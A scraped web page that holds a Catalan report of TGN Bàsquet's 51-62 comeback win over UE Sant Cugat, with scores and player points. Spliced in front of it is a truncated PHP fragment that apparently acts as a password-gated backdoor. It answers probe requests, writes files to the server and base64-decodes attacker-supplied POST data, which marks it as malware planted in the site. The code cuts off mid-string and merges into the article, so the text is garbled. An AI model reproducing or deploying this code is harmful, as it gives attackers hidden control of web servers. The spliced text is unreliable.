function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Remuntada i triomf Lila! (51-62) -

Remuntada i triomf Lila! (51-62)

Updated: març 15, 2023

Partit igualat, que a l’anada va ser victòria per la mínima (d’1), i es preveia un matx similar, ja que també a la classificació ambdós conjunts anaven similars. L’equip de Sant Cugat tornava a jugar el partit amb plantilla curta amb només 8 jugadores.

El partit va començar complicat per al TGN, amb un bon inici local i les jugadores tarragonines tractant d’entrar en ritme de partit. I així ho va fer! Les jugadores liles van arribar quan faltaven 11 minuts de partit, al tercer quart, 9 punts per sota al marcador. Si bé, no es van rendir, i amb una bona feina defensiva, i un parcial de 2-22 a favor de les del TGN en els últims 11 minuts va suposar una volta al marcador i es va tancar el partit a favor del TGN Bàsquet. Cal destacar que l’equip local només va aconseguir anotar 2 punts en tot l’últim quart.

UE SANT CUGAT NEGRE 51- 62 TGN BÀSQUET 09B

PARCIALS: 17-14, 17-16, 15-14, 02-18.

UE SANT CUGAT NEGRE: Zamora (11), Almazán (11), Ruiz. C (0), Serrano (19), Molinos (6) —cinc inicial— Gómez (4), El Kharraz (0), i Ruiz. D (0).  0 triples. 13/30 tirs lliures. 13 faltes. Eliminada: Almazán (min 40)

TGN BÀSQUET 09B: Montell (14), Fernández (6), Prades (6), Diez (2), Carayol (0) —cinc inicial— Sabate (3), Burjales (4), Meroño (15), Giramé (6), Gandía (2), i Sala (4).  1 triples: Carayol (0).  4/10.   tirs lliures. 24 faltes. Eliminada: –